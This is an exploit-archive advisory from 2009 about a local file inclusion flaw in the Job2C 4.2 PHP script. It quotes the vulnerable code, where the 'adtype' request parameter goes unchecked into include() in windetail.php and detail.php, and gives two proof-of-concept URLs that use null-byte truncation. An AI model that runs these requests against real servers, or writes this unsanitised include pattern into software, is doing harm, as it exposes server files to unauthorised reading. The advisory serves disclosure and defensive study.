[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Job2C 4.2 (adtype) Local File Inclusion Vulnerability
# Published : 2009-04-15
# Author : ZoRLu
# Previous Title : Koschtit Image Gallery 1.82 Multiple Local File Inclusion Vulnerabilities
# Next Title : FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability
[~] Job2C version 4.2 (adtype) MulTiple LFi
[~]
[~] Script: http://www.w2b.ru/download/Job2C.zip
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 15.04.2009
[~]
[~] Home: yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com
[~]
[~] contact: trt-turk@hotmail.com
[~]
[~] N0T: Herkes Hecker Olmus :S yav siktirin gidin mal mal gelip msn de konusmayIn :S Herkes Ustune AlInmasIn anlayan anladI :S
[~]
[~] N0T: if you wanna learn hack you must be register to my site yildirimordulari.com
[~] -----------------------------------------------------------
file:
windetail.php
err0r c0de:
$adtype=$_REQUEST["adtype"];
$id=$_REQUEST["id"]; ( err0r c0de 1 )
$title=$_REQUEST["title"];
winHead($title);
include("lib/".$adtype.".inc"); ( err0r c0de 2 )
exp 1:
yildirimordulari.com/script/windetail.php?adtype=LF??%00
file:
detail.php
err0r c0de:
$mode=$_REQUEST["mode"];
$adtype=$_REQUEST["adtype"]; ( err0r c0de 1 )
$id=$_REQUEST["id"];
$auth=$_SESSION["auth"];
include("conf/conf.inc");
include("lib/lib.inc");
include("lib/addlib.inc");
include("templates/header.inc");
if(!$adtype)$adtype="res";
include("lib/".$adtype.".inc"); ( err0r c0de 1 )
exp 2:
yildirimordulari.com/script/detail.php?adtype=LF??%00
[~] ----------------------------------------------------------------------
[~] Greetz tO: str0ke & DrLy0N & w0cker & Cyber-Zone & stack
[~]
[~] yildirimordulari.com / dafgamers.com / z0rlu.blogspot.com
[~]
[~] ----------------------------------------------------------------------
# www.Syue.com [2009-04-15]